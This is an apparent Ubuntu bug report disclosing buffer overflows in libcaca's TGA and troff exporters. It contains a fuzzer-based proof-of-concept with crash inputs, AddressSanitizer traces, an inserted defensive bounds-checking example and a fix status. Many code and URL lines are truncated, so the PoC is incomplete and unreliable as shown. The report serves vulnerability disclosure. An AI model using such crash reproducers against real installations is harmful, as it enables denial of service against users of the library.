buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
libcaca (Ubuntu) | Fix Released | Undecided | Unassigned |
Bug Description
Hello Ubuntu Security Team,
I use libfuzzer to test the libcaca API. I found two crashes:
- https:/
- https:/
-------
## Vendor of Product
https:/
-------
## Affected Product Code Base
libcaca e4968ba
-------
## Affected Component
affected component:
-------
## Affected source code file
affected source code file (as call stack):
->caca_
-> export_tga() in libcaca/
-> export_troff() in libcaca/
-------
## Attack Type
Context-dependent
-------
## Impact Denial of Service
true
-------
## Reference
https:/
-------
## Discoverer
fdgnneig
-------
## Verification process and POC
### Verification steps:
1. Get the source code of libcaca:
2. Compile the libcaca.so library:
```shell
$ cd libcaca
$ apt-get install automake libtool pkg-config -y
$ ./bootstrap
$ ./configure
$ make
```
3. Run POC.sh to compile poc_troff.cc and poc_tga.cc
4. Run POC
-------
POC.sh
```shell
cat << EOF > poc_troff.cc
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fstream>
#include <iostream>
using namespace std;
extern "C" int LLVMFuzzerTestO
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)
memset(
memcpy(
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_
for(int i=0;i<4;i++)
for(int i=0;i<4;i++){
}
void* reData = caca_export_
if(reData!=NULL) free(reData);
caca_free_
cv=NULL;
free(buffer);
buffer=NULL;
return 0;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] = {0x5f,0x20,
len = sizeof(
return 0;
}
EOF
clang++ -g poc_troff.cc -O2 -fno-omit-
cat << EOF > poc_tga.cc
#include "config.h"
#include "caca.h"
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fstream>
#include <iostream>
using namespace std;
extern "C" int LLVMFuzzerTestO
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)
memset(
memcpy(
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_
for(int i=0;i<4;i++)
for(int i=0;i<4;i++){
}
void* reData = caca_export_
if(reData!=NULL) free(reData);
caca_free_
cv=NULL;
free(buffer);
buffer=NULL;
return 0;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] = {0x00,0xff,
len = sizeof(
return 0;
}
EOF
clang++ -g poc_tga.cc -O2 -fno-omit-
```
-------
The output is as follows:
```shell
==1845495==ERROR: AddressSanitizer: heap-buffer-
WRITE of size 1 at 0x603000000022 thread T0
#0 0x7f905c1bf43f in export_tga /home/hh/
#1 0x7f905c1bf43f in caca_export_memory /home/hh/
#2 0x4c6d46 in LLVMFuzzerTestO
#3 0x4c6e1c in main /home/hh/
#4 0x7f905bc0e0b2 in __libc_start_main /build/
#5 0x41c39d in _start (/home/
0x603000000022 is located 0 bytes to the right of 18-byte region [0x603000000010
allocated by thread T0 here:
#0 0x494add in malloc (/home/
#1 0x7f905c1be0eb in export_tga /home/hh/
#2 0x7f905c1be0eb in caca_export_memory /home/hh/
#3 0x4c6d46 in LLVMFuzzerTestO
#4 0x4c6e1c in main /home/hh/
#5 0x7f905bc0e0b2 in __libc_start_main /build/
SUMMARY: AddressSanitizer: heap-buffer-
Shadow bytes around the buggy address:
0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c067fff8000: fa fa 00 00[02]fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1845495==ABORTING
```
```shell
==1845916==ERROR: AddressSanitizer: global-
READ of size 8 at 0x7f28d47e8140 thread T0
#0 0x7f28d46fb798 in export_troff /home/hh/
#1 0x7f28d46fb798 in caca_export_memory /home/hh/
#2 0x4c6d46 in LLVMFuzzerTestO
#3 0x4c6e1c in main /home/hh/
#4 0x7f28d414a0b2 in __libc_start_main /build/
#5 0x41c39d in _start (/home/
0x7f28d47e8140 is located 0 bytes to the right of global variable 'ansi2troff' defined in 'codec/
SUMMARY: AddressSanitizer: global-
Shadow bytes around the buggy address:
0x0fe59a8f4fd0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0fe59a8f4fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f4ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5010: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=>0x0fe59a8f5020: 00 00 00 00 00 00 00 00[f9]f9 f9 f9 00 00 00 00
0x0fe59a8f5030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1845916==ABORTING
```
Thanks
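As an added illustration, not code from libcaca or from the reporter, the two defensive patterns that address the bug classes the ASan reports above describe: a global-buffer-overflow READ past the end of a lookup table (the `ansi2troff` case) is prevented by range-checking the index before it touches the table, and a heap-buffer-overflow WRITE of one byte at the end of a freshly malloc'd export region (the `export_tga` case) is prevented by computing the buffer size and performing the writes through a single capacity-tracking path that counts the terminator. The palette table and the names `palette_name`, `outbuf`, `export_size`, `export_cells` and `sample_cells` are constructed for this example and are not libcaca's API.

```c
/* Added illustration (constructed, not libcaca's code): defensive patterns for
 * the two bug classes in the ASan reports above.
 *  - palette_name(): a lookup guarded by an explicit range check, the check
 *    whose absence yields a global-buffer-overflow READ past a table.
 *  - export_cells(): a text exporter whose buffer size and writes go through
 *    one capacity-tracking path, so the terminating byte is always accounted
 *    for (the "WRITE of size 1, 0 bytes to the right of the region" pattern). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PALETTE_LEN 16
/* Constructed 16-entry palette; the names are illustrative only. */
static const char *const palette_names[PALETTE_LEN] = {
    "black", "blue", "green", "cyan", "red", "magenta", "brown", "lightgray",
    "darkgray", "lightblue", "lightgreen", "lightcyan", "lightred",
    "lightmagenta", "yellow", "white"
};

/* The index comes from canvas data the exporter does not control: check it
 * before it is used as a subscript, and map anything out of range to a
 * fallback instead of reading past the table. */
const char *palette_name(uint32_t idx)
{
    if (idx >= PALETTE_LEN)
        return "default";
    return palette_names[idx];
}

/* Output buffer that refuses any write beyond its capacity. */
struct outbuf {
    char *data;
    size_t len;      /* bytes written so far */
    size_t cap;      /* bytes allocated */
    int overflow;    /* set when a write was refused */
};

static int outbuf_put(struct outbuf *b, const void *src, size_t n)
{
    if (n > b->cap - b->len) {
        b->overflow = 1;
        return -1;
    }
    memcpy(b->data + b->len, src, n);
    b->len += n;
    return 0;
}

/* Exact number of bytes export_cells() will write, including the final NUL:
 * each cell is its name plus a ';' (or '\n' at the end of a row). */
size_t export_size(const uint8_t *cells, size_t w, size_t h)
{
    size_t total = 0;
    for (size_t y = 0; y < h; y++)
        for (size_t x = 0; x < w; x++)
            total += strlen(palette_name(cells[y * w + x])) + 1;
    return total + 1;   /* the terminator: the byte an off-by-one forgets */
}

/* Returns a malloc'd NUL-terminated string, or NULL on allocation failure or
 * if the size computation and the writer ever disagree (caught, not overflowed). */
char *export_cells(const uint8_t *cells, size_t w, size_t h, size_t *out_len)
{
    struct outbuf b = { NULL, 0, export_size(cells, w, h), 0 };
    b.data = malloc(b.cap);
    if (b.data == NULL)
        return NULL;
    for (size_t y = 0; y < h; y++) {
        for (size_t x = 0; x < w; x++) {
            const char *name = palette_name(cells[y * w + x]);
            outbuf_put(&b, name, strlen(name));
            outbuf_put(&b, (x + 1 == w) ? "\n" : ";", 1);
        }
    }
    outbuf_put(&b, "", 1);            /* terminator, counted in export_size() */
    if (b.overflow) {
        free(b.data);
        return NULL;
    }
    if (out_len != NULL)
        *out_len = b.len - 1;         /* length without the NUL */
    return b.data;
}

/* Constructed 2x2 sample canvas; 255 is deliberately out of palette range. */
const uint8_t sample_cells[4] = { 0, 15, 255, 7 };

/* Runs the sample export and returns 1 if the output is exactly as expected. */
int sample_export_ok(void)
{
    size_t n = 0;
    char *out = export_cells(sample_cells, 2, 2, &n);
    int ok = out != NULL && n == 30 &&
             strcmp(out, "black;white\ndefault;lightgray\n") == 0;
    free(out);
    return ok;
}

int main(void)
{
    size_t n = 0;
    char *out = export_cells(sample_cells, 2, 2, &n);
    if (out == NULL)
        return 1;
    printf("%zu bytes:\n%s", n, out);
    free(out);
    return 0;
}
```

The point of routing every write through `outbuf_put` is that a mismatch between the size calculation and the emitted bytes surfaces as a refused write and a NULL return, rather than as the one-byte heap overrun ASan flagged; building with `-fsanitize=address`, as the reporter's harness does, is still the right way to confirm that no path writes past `cap`.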
CVE References
summary: libcaca → libcaca buffer-overflow
information type: Private Security → Public Security
summary: libcaca buffer-overflow → buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
Changed in libcaca (Ubuntu): status: New → Confirmed
Changed in libcaca (Ubuntu): status: Confirmed → Fix Released
source code
## Affected Product Code Base
libcaca, 0.99.beta20
Ubuntu 20.04
libcaca 0.99.beta19